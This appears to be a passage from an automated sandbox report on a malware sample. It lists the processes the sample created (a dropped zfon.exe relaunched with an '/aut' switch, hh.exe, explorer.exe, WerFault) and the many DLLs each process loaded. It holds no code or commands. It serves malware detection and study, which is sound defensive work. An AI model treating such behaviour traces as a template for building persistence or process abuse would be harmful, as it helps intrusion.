Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe"
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exe
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 396
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 92
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: unknownProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe" Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /autJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exeJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: libcef.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: libcef.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
